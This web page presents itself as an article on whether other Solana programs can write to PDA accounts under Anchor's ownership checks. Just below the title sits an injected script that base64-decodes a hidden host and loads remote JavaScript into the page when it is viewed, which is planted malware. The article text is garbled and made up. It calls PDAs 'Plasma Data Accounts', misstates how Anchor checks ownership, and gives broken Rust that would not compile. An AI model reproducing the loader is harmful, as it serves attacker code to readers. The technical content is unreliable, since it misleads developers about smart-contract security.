Solana: Can other programs write to portable accounts even if an account type is used and ownership is checked?
const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”c.php?u=c81dae3e”;document.body.appendChild(script);
Here is a draft article on the topic:
Solana: Can other programs write to PDA accounts even if the account type is used and ownership is checked?
When building decentralized applications (dApps) for Solana, you may encounter scenarios where other programs need to access Plasma Data Accounts (PDAs). The Anchor Framework provides a convenient way to manage these interactions using the #[account] macro. However, we often wonder: can other programs write to PDA accounts if the account type is used and ownership is checked?
Anchor Framework “#[account]” Macro
In the Anchor Framework, the [#[account]] macro allows you to define a Plasma Data Account in your program. This account has its own storage variables, events, and methods that can be called on it. The “Account” type is used to represent these variables and events.
When defining an account, the Anchor framework checks whether the account ownership is correct by ensuring that:
*The account owner is not the current program.
- If the ownership check fails, the account is marked as unowned.
Can other programs write to PDA accounts after ownership is checked?
Now let’s consider whether other programs can write to PDA accounts even if the account type is used and ownership is checked. The short answer is: yes, but only under certain conditions.
When you define an account with the [#[account]] macro, the Anchor framework adds a set of storage variables that are linked to the account owner. Other programs that are allowed to write to PDA accounts can use these variables. However, the ownership check still applies, and if it fails, the account is marked as unowned.
To write to a PDA account with ownership checked, you must:
- Make sure that the program has the necessary permissions to access storage variables linked to the account owner.
- Make sure that the account type is used correctly by checking the account ownership before writing to it.
Example code: Writing to a PDA account with ownership checked
Here is a sample code snippet from a Solana program:
use anchor_lang::prelude::*;
#[program]
pub mod my_program {
use super::{MyAccount, MyStorage};
#[account]
pub struct MyAccount {
pub storage_var1: u8,
pub storage_var2: i32,
}
#[params]
pub fn create_account(
_owner: Account ID,
_data: [u8; 32],
) -> Result {
let my_account = My Account {
storage_var1: 42,
storage_var2: 123,
};
Self::set_initial_value(my_account).signer?;
Ok (my_account)
}
#[action]
pub fn write_to_storage(
but self: account,
_data: [u8; 32],
) -> Result {
if !self.owner.key == current_program.key {
return Err(Error::InvalidProgramId);
}
// Write to storage variables
Ok (())
}
#[action]
pub fn read_from_storage(
but self: account,
_data: [u8; 32],
) -> Result {
if !self.owner.key == current_program.key {
return Err(Error::InvalidProgramId);
}
// Read from storage variables
Ok (())
}
#[program]
pub mod main {
use super::*;
const STORAGE_VAR1: u8 = 42;
const STORAGE_VAR2: i32 = 123;
pub fn my_program() -> Result {
let my_account = My_account::create()?;
Ok(my_account)
}
}
}
In this example, the functions “write_to_storage” and “read_from_storage” check whether they have permission to use the storage variables linked to the account owner. If not, they return an error.
We write rarely, but only the best content.
